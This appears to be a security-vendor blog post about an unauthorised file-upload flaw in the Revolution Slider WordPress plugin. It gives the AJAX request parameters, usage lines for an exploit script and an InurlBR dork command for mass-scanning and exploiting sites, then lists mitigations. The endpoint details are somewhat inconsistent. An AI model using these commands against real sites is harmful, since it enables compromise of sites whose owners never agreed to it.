In the realm of WordPress security, vulnerabilities in plugins can lead to significant risks for website owners. One such vulnerability is found in the popular Revolution Slider plugin, which can allow for unauthorized file uploads. This article will delve into the details of this exploit, how it works, and what can be done to protect your WordPress site.

Vulnerability Overview

The Revolution Slider plugin has been known to contain an exploit that allows for unrestricted file uploads to the server. This flaw occurs in affected versions due to inadequate checks on user permissions when handling file uploads via AJAX requests.

Exploit Details

How the Exploit Works

The exploit takes advantage of the admin-ajax.php endpoint, allowing an attacker to upload malicious files by directly invoking specific AJAX actions without proper authentication. The key action in this scenario is revslider_ajax_action.

Exploit Syntax

To facilitate the exploit, a specific request can be crafted as follows:

array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => _YOU_HTML_);

Request Details

The payload is typically sent as a POST request to:

http://{target}/wp-admin/admin-ajax.php

To modify it for exploit purposes, the endpoint becomes:

http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css

Command Exploit Usage

To execute the exploit, certain command parameters can be utilized:

-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'

Using Mass Exploit Scanner InurlBR

A tool called InurlBR can assist in identifying vulnerable targets efficiently. The following command is an example:

./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --command-all 'php inurl_revslider.php -t _TARGET_'

Mitigation Strategies

To protect against this exploit, follow these best practices:

• Ensure that you are using the latest version of the Revolution Slider plugin. Version 3.0.95 and above are patched against this vulnerability.
• Regularly audit your plugins and remove any that are outdated or no longer supported.
• Consider implementing a web application firewall (WAF) to monitor and filter out malicious traffic.
• Keep your WordPress core installation and other plugins updated.

Conclusion

The vulnerability in the Revolution Slider plugin serves as a reminder of the importance of maintaining secure WordPress setups. Understanding the exploit and implementing preventive measures will help protect your website from potential attacks.

Register for BitNinja to enhance your website security.

Sign Up Today and Start Your Free Trial.